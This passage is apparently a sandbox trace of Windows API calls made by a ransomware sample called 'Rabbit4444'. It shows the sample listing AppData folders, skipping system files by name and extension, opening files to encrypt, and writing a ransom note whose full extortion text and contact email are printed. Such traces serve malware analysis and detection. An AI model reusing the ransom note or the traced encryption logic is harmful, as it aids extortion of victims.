returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\AC\\INetCache\\" [0068.794] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\AC\\INetCache\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\AC\\INetCache\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\AC\\INetCache\\.BFC0E91B00AE8A0620D3" [0068.794] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\AC\\INetCache\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.modalsharepickerhost_cw5n1h2txyewy\\ac\\inetcache\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0xffffffff [0068.794] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\AC\\INetCache" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\AC\\INetCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\AC\\INetCache" [0068.794] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\AC\\INetCache", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\AC\\INetCache\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\AC\\INetCache\\" [0068.794] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\AC\\INetCache\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\AC\\INetCache\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\AC\\INetCache\\.BFC0E91B00AE8A0620D3" [0068.794] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\AC\\INetCache\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.modalsharepickerhost_cw5n1h2txyewy\\ac\\inetcache\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x228 [0068.795] ReadFile (in: hFile=0x228, lpBuffer=0x11cca28, nNumberOfBytesToRead=0x3d4, lpNumberOfBytesRead=0x11cca24, lpOverlapped=0x0 | out: lpBuffer=0x11cca28*, lpNumberOfBytesRead=0x11cca24*=0x3d4, lpOverlapped=0x0) returned 1 [0068.795] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x4) returned 0x105560 [0068.795] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x11b278 [0068.795] lstrlenA (lpString="b4 JJ up So Ri VJ zb Gs aV zP xm 6E 9W Y1 vI Np\r\nr8 AZ 3V e2 /2 HZ 3m c7 jm eL tD W+ B4 uf S1 ti\r\nDt sJ m2 cw Jt Ud T8 2Z Xb FK Va Cd 1K fR kD X2\r\nwj Ht G7 BW tA mm +H YT 9R vU I5 y9 eh /F 4J GH\r\n+j x1 qZ 6+ tf 2I zQ Sh PI ei T0 Rt U2 M7 1p wT\r\n9Q VS Zp JM Ua UA Lf YT AB yP nf PD Vf 7J Lg s2\r\nmy bV QN IS Bd XQ DS OB tJ sa Hs 5K uR Nj xr sH\r\nNV pi 1D zP l9 V1 Gq 0k Cn WK Om 0Q /F fm oS 55\r\nH5 Jx Dd zc lS Lm uh 0e Qb fg FR Wl lf 0e zP m6\r\nzz On 3h I+ Ux /I cs 0D bM zU /e lR FE q5 +b 53\r\niW eW Ks Ee ZN qJ gP vb 3c 1n iv O5 y3 ih f3 z4\r\n8y aZ jq Oy +L 13 Oj qv Qr Kd hl 2g SU r3 Mv Sa\r\ntv kF TD DN 70 T/ Cv c3 h0 RE rU vo L/ 21 eN zT\r\nuc 1u J/ Op E3 Rx n9 +n Dl jh Mr +v oh xp sN EI\r\nkA YM 2F bl Vl BZ ti +J 2n pk Vb If jW 1M Ee py\r\nUU YZ 06 k/ RM FR tD DV ro Os f8 Zy Jd 7M hk 12\r\nlY bs A1 FV Ri ks fR 2b Wb 88 wL Zq WG 6v Db PN\r\nQ5 X3 LA mF mv qx 1Z mW G2 6k 3o KJ Vg qW 6M F/\r\nco JP wB ws yb zm p9 zT Ja na kx Wb xY Nc f+ Y+\r\nWJ Kj j7 sB S1 RI KH Fh OB aF +3 FZ b0 XD 4G T0\r\nGK fC Qd q5 Vo Md 4O It Nz V/ Fe Q2 51 db hm vg\r\n4t yn AS Fx QT o= ") returned 1047 [0068.795] lstrlenA (lpString="{{ID}}") returned 6 [0068.795] lstrlenA (lpString=" YOUR FILES ARE ENCRYPTED !!!\r\n\r\nTO DECRYPT, FOLLOW THE INSTRUCTIONS:\r\n\r\nTo recover data you need decrypt tool.\r\n\r\nTo get the decrypt tool you should:\r\n\r\n1.In the letter include your personal ID! Send me this ID in your first email to me!\r\n2.We can give you free test for decrypt few files (NOT VALUE) and assign the price for decryption all files!\r\n3.After we send you instruction how to pay for decrypt tool and after payment you will receive a decryption tool! \r\n4.We can decrypt few files in quality the evidence that we have the decoder.\r\n\r\n\r\n DO NOT TRY TO DO SOMETHING WITH YOUR FILES BY YOURSELF YOU WILL BRAKE YOUR DATA !!! ONLY WE ARE CAN HELP YOU! CONTACT US:\r\n\r\nChina.helper@aol.com \r\n\r\n\r\n ATTENTION !!! THIS IS YOUR PERSONAL ID WICH YOU HAVE TO SEND IN FIRST LETTER:\r\n\r\n{{ID}}\r\n") returned 827 [0068.795] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x74c) returned 0x104018 [0068.795] CloseHandle (hObject=0x228) returned 1 [0068.795] GetLastError () returned 0x0 [0068.795] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\AC\\INetCache") returned 104 [0068.795] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0068.795] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\AC\\INetCache\\*", lpFindFileData=0x11ce2f0 | out: lpFindFileData=0x11ce2f0*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x7544fabf, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x7544fabf, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf12371ec, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102890 [0068.795] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0068.795] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0068.795] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0068.795] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0068.795] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x11ce2f0 | out: lpFindFileData=0x11ce2f0*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x7544fabf, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x7544fabf, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf12371ec, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0068.796] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0068.796] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0068.796] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0068.796] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0068.796] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0068.796] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x11ce2f0 | out: lpFindFileData=0x11ce2f0*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf12371ec, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf12371ec, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf12371ec, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0x0, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0068.796] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0068.796] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0068.796] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x11ce2f0 | out: lpFindFileData=0x11ce2f0*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf12371ec, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf12371ec, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf12371ec, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0x0, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0068.796] FindClose (in: hFindFile=0x102890 | out: hFindFile=0x102890) returned 1 [0069.224] lstrcpyW (in: lpString1=0x11cef12, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0069.225] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\AC\\INetCache\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.modalsharepickerhost_cw5n1h2txyewy\\ac\\inetcache\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0069.232] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x29c [0069.234] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0069.235] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0069.235] CloseHandle (hObject=0x29c) returned 1 [0069.242] CloseHandle (hObject=0x280) returned 1 [0069.248] GetCurrentThreadId () returned 0xbec [0069.248] RtlInterlockedPopEntrySList (in: ListHead=0x1220a8 | out: ListHead=0x1220a8) returned 0x0 [0069.248] GetCurrentThreadId () returned 0xbec [0069.249] WaitForMultipleObjects (nCount=0x0, lpHandles=0x11ce540*=0x0, bWaitAll=1, dwMilliseconds=0xffffffff) returned 0xffffffff [0069.254] RtlInterlockedPopEntrySList (in: ListHead=0x1220a8 | out: ListHead=0x1220a8) returned 0x0 [0069.254] RtlInterlockedFlushSList (in: ListHead=0x1220a8 | out: ListHead=0x1220a8) returned 0x0 [0069.255] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1220a0 | out: hHeap=0xe0000) returned 1 [0069.256] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xff6f8 | out: hHeap=0xe0000) returned 1 [0069.257] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x104018 | out: hHeap=0xe0000) returned 1 [0069.257] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105560 | out: hHeap=0xe0000) returned 1 [0069.257] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11b278 | out: hHeap=0xe0000) returned 1 Thread: id = 26 os_tid = 0xd58 [0069.844] RtlInterlockedPopEntrySList (in: ListHead=0x121f88 | out: ListHead=0x121f88) returned 0x1220a8 [0069.844] lstrcpynW (in: lpString1=0x11ce8c0, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB" [0069.844] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x116930 | out: hHeap=0xe0000) returned 1 [0069.844] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1220a0 | out: hHeap=0xe0000) returned 1 [0069.844] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB" [0069.844] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB\\" [0069.844] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB\\.BFC0E91B00AE8A0620D3" [0069.844] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\appdata\\indexed db\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0xffffffff [0069.844] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB" [0069.844] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB\\" [0069.844] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB\\.BFC0E91B00AE8A0620D3" [0069.844] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\appdata\\indexed db\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0069.845] ReadFile (in: hFile=0x280, lpBuffer=0x11cc4a8, nNumberOfBytesToRead=0x3d4, lpNumberOfBytesRead=0x11cc4a4, lpOverlapped=0x0 | out: lpBuffer=0x11cc4a8*, lpNumberOfBytesRead=0x11cc4a4*=0x3d4, lpOverlapped=0x0) returned 1 [0069.845] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x4) returned 0x1055b0 [0069.845] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x11b278 [0069.845] lstrlenA (lpString="b4 JJ up So Ri VJ zb Gs aV zP xm 6E 9W Y1 vI Np\r\nr8 AZ 3V e2 /2 HZ 3m c7 jm eL tD W+ B4 uf S1 ti\r\nDt sJ m2 cw Jt Ud T8 2Z Xb FK Va Cd 1K fR kD X2\r\nwj Ht G7 BW tA mm +H YT 9R vU I5 y9 eh /F 4J GH\r\n+j x1 qZ 6+ tf 2I zQ Sh PI ei T0 Rt U2 M7 1p wT\r\n9Q VS Zp JM Ua UA Lf YT AB yP nf PD Vf 7J Lg s2\r\nmy bV QN IS Bd XQ DS OB tJ sa Hs 5K uR Nj xr sH\r\nNV pi 1D zP l9 V1 Gq 0k Cn WK Om 0Q /F fm oS 55\r\nH5 Jx Dd zc lS Lm uh 0e Qb fg FR Wl lf 0e zP m6\r\nzz On 3h I+ Ux /I cs 0D bM zU /e lR FE q5 +b 53\r\niW eW Ks Ee ZN qJ gP vb 3c 1n iv O5 y3 ih f3 z4\r\n8y aZ jq Oy +L 13 Oj qv Qr Kd hl 2g SU r3 Mv Sa\r\ntv kF TD DN 70 T/ Cv c3 h0 RE rU vo L/ 21 eN zT\r\nuc 1u J/ Op E3 Rx n9 +n Dl jh Mr +v oh xp sN EI\r\nkA YM 2F bl Vl BZ ti +J 2n pk Vb If jW 1M Ee py\r\nUU YZ 06 k/ RM FR tD DV ro Os f8 Zy Jd 7M hk 12\r\nlY bs A1 FV Ri ks fR 2b Wb 88 wL Zq WG 6v Db PN\r\nQ5 X3 LA mF mv qx 1Z mW G2 6k 3o KJ Vg qW 6M F/\r\nco JP wB ws yb zm p9 zT Ja na kx Wb xY Nc f+ Y+\r\nWJ Kj j7 sB S1 RI KH Fh OB aF +3 FZ b0 XD 4G T0\r\nGK fC Qd q5 Vo Md 4O It Nz V/ Fe Q2 51 db hm vg\r\n4t yn AS Fx QT o= ") returned 1047 [0069.845] lstrlenA (lpString="{{ID}}") returned 6 [0069.845] lstrlenA (lpString=" YOUR FILES ARE ENCRYPTED !!!\r\n\r\nTO DECRYPT, FOLLOW THE INSTRUCTIONS:\r\n\r\nTo recover data you need decrypt tool.\r\n\r\nTo get the decrypt tool you should:\r\n\r\n1.In the letter include your personal ID! Send me this ID in your first email to me!\r\n2.We can give you free test for decrypt few files (NOT VALUE) and assign the price for decryption all files!\r\n3.After we send you instruction how to pay for decrypt tool and after payment you will receive a decryption tool! \r\n4.We can decrypt few files in quality the evidence that we have the decoder.\r\n\r\n\r\n DO NOT TRY TO DO SOMETHING WITH YOUR FILES BY YOURSELF YOU WILL BRAKE YOUR DATA !!! ONLY WE ARE CAN HELP YOU! CONTACT US:\r\n\r\nChina.helper@aol.com \r\n\r\n\r\n ATTENTION !!! THIS IS YOUR PERSONAL ID WICH YOU HAVE TO SEND IN FIRST LETTER:\r\n\r\n{{ID}}\r\n") returned 827 [0069.845] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x74c) returned 0x104018 [0069.845] CloseHandle (hObject=0x280) returned 1 [0069.845] GetLastError () returned 0x0 [0069.845] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB") returned 97 [0069.845] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0069.845] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB\\*", lpFindFileData=0x11cdd70 | out: lpFindFileData=0x11cdd70*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3230f148, ftCreationTime.dwHighDateTime=0x1d32716, ftLastAccessTime.dwLowDateTime=0xea526dce, ftLastAccessTime.dwHighDateTime=0x1d35e03, ftLastWriteTime.dwLowDateTime=0xf22c1637, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102990 [0069.845] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0069.845] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0069.845] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0069.845] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0069.845] FindNextFileW (in: hFindFile=0x102990, lpFindFileData=0x11cdd70 | out: lpFindFileData=0x11cdd70*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3230f148, ftCreationTime.dwHighDateTime=0x1d32716, ftLastAccessTime.dwLowDateTime=0xea526dce, ftLastAccessTime.dwHighDateTime=0x1d35e03, ftLastWriteTime.dwLowDateTime=0xf22c1637, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0069.845] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0069.845] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0069.845] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0069.845] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0069.845] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0069.846] FindNextFileW (in: hFindFile=0x102990, lpFindFileData=0x11cdd70 | out: lpFindFileData=0x11cdd70*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf22c1637, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf22c1637, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf22e7831, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0x0, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0069.846] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0069.846] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0069.846] FindNextFileW (in: hFindFile=0x102990, lpFindFileData=0x11cdd70 | out: lpFindFileData=0x11cdd70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3235b602, ftCreationTime.dwHighDateTime=0x1d32716, ftLastAccessTime.dwLowDateTime=0x3235b602, ftLastAccessTime.dwHighDateTime=0x1d32716, ftLastWriteTime.dwLowDateTime=0x5c97dbe, ftLastWriteTime.dwHighDateTime=0x1d47c36, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x0, dwReserved1=0x0, cFileName="edb.chk", cAlternateFileName="")) returned 1 [0069.846] lstrcmpiW (lpString1="edb.chk", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0069.846] lstrcmpiW (lpString1="edb.chk", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0069.846] lstrcmpiW (lpString1="edb.chk", lpString2="Rabbit4444.exe") returned -1 [0069.846] lstrcmpiW (lpString1="edb.chk", lpString2=".") returned 1 [0069.846] lstrcmpiW (lpString1="edb.chk", lpString2="..") returned 1 [0069.846] lstrcmpiW (lpString1="edb.chk", lpString2="windows") returned -1 [0069.846] lstrcmpiW (lpString1="edb.chk", lpString2="bootmgr") returned 1 [0069.846] lstrcmpiW (lpString1="edb.chk", lpString2="pagefile.sys") returned -1 [0069.846] lstrcmpiW (lpString1="edb.chk", lpString2="boot") returned 1 [0069.846] lstrcmpiW (lpString1="edb.chk", lpString2="ids.txt") returned -1 [0069.846] lstrcmpiW (lpString1="edb.chk", lpString2="NTUSER.DAT") returned -1 [0069.846] lstrcpyW (in: lpString1=0x11ce984, lpString2="edb.chk" | out: lpString1="edb.chk") returned="edb.chk" [0069.846] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB\\edb.chk", dwFileAttributes=0x0) returned 1 [0070.083] lstrlenW (lpString="edb.chk") returned 7 [0070.083] lstrlenW (lpString="Rabbit4444") returned 10 [0070.083] lstrcmpiW (lpString1="", lpString2="Rabbit4444") returned -1 [0070.084] lstrlenW (lpString=".dll") returned 4 [0070.085] lstrcmpiW (lpString1=".chk", lpString2=".dll") returned -1 [0070.085] lstrlenW (lpString=".lnk") returned 4 [0070.085] lstrcmpiW (lpString1=".chk", lpString2=".lnk") returned -1 [0070.085] lstrlenW (lpString=".ini") returned 4 [0070.085] lstrcmpiW (lpString1=".chk", lpString2=".ini") returned -1 [0070.085] lstrlenW (lpString=".sys") returned 4 [0070.085] lstrcmpiW (lpString1=".chk", lpString2=".sys") returned -1 [0070.085] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB\\edb.chk" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\appdata\\indexed db\\edb.chk"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x29c [0070.086] QueryPerformanceFrequency (in: lpFrequency=0x11cbd40 | out: lpFrequency=0x11cbd40*=100000000) returned 1 [0070.086] QueryPerformanceCounter (in: lpPerformanceCount=0x11cbd48 | out: lpPerformanceCount=0x11cbd48*=16139632836) returned 1 [0070.086] GetFileSizeEx (in: hFile=0x29c, lpFileSize=0x11cbda0 | out: lpFileSize=0x11cbda0*=8192) returned 1 [0070.086] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1179c8 [0070.086] RtlAllocateHeap 